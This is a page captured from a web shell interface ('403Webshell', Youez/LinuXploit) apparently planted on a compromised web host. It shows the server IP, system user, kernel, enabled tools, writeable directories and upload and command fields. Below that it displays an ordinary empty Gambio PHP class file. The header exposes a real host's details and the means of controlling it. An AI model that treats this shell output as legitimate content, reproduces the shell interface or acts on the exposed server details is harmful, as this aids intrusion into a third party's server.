403Webshell
Server IP : 85.158.181.41  /  Your IP : 216.73.217.12
Web Server : Apache
System : Linux cloud9-vm129 6.1.178+1-ph #ph SMP PREEMPT_DYNAMIC Wed Jul 29 09:00:54 UTC 2026 x86_64
User : moncbefd ( 1024)
PHP Version : 7.3.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/moncbefd/www.moneta.at/system/classes/filter/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/moncbefd/www.moneta.at/system/classes/filter/FeatureProductFinder.inc.php
<?php
/* --------------------------------------------------------------
   FeatureProductFinder.inc.php 2010-11-16 gm
   Gambio GmbH
   http://www.gambio.de
   Copyright (c) 2010 Gambio GmbH
   Released under the GNU General Public License (Version 2)
   [http://www.gnu.org/licenses/gpl-2.0.html]
   --------------------------------------------------------------

*
 * class FeatureProductFinder
 * 
 */
/******************************* Abstract Class ****************************
  FeatureProductFinder does not have any pure virtual methods, but its author
  defined it as an abstract class, so you should not use it directly.
  Inherit from it instead and create only objects from the derived classes
*****************************************************************************/

class FeatureProductFinder
{

		/** Aggregations: */

		/** Compositions: */

		/**
		 * ids for inclusive-OR operations
		 *
		 * @param int p_categories_id 
		 * @param bool p_recursively 
		 * @return 
		 * @access public
		 */
		function add_categories_id( $p_categories_id,  $p_recursively = true )
		{
				
		} // end of member function add_categories_id

		/**
		 * ids for AND operations
		 *
		 * @param int p_feature_value_id 
		 * @return 
		 * @access public
		 */
		function add_feature_value_id( $p_feature_value_id )
		{
				
		} // end of member function add_feature_value_id

		/**
		 * 
		 *
		 * @param float p_from 
		 * @param float p_to 
		 * @return 
		 * @access public
		 */
		function set_price_range( $p_from,  $p_to = null )
		{
				
		} // end of member function set_price_range

		/**
		 * 
		 *
		 * @return array
		 * @access public
		 */
		function get_products_array( )
		{
				
		} // end of member function get_products_array





} // end of FeatureProductFinder
?>

Youez - 2016 - github.com/yon3zu
LinuXploit